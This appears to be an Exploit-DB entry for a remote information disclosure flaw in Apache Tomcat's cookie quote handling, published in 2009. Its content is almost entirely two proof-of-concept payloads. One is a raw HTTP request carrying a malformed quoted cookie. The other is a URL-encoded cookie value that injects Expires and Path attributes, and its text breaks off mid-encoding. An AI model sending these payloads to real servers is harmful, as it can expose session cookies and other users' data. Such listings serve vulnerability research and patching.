Apache Tomcat - Cookie Quote Handling Remote Information Disclosure

EDB-ID:

9994

CVE:

N/A

Author:

John Kew

Type:

remote

Platform:

Multiple

Published:

2009-11-09

The following examples are available:

+++
GET /myapp/MyCookies HTTP/1.1
Host: localhost
Cookie: name="val " ue"
Cookie: name1=moi
+++

http://www.example.com/examples/servlets/servlet/CookieExample?cookiename=test&cookievalue=test%5c%5c%22%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%
3B+Path%3D%2Fservlets-examples%2Fservlet+%3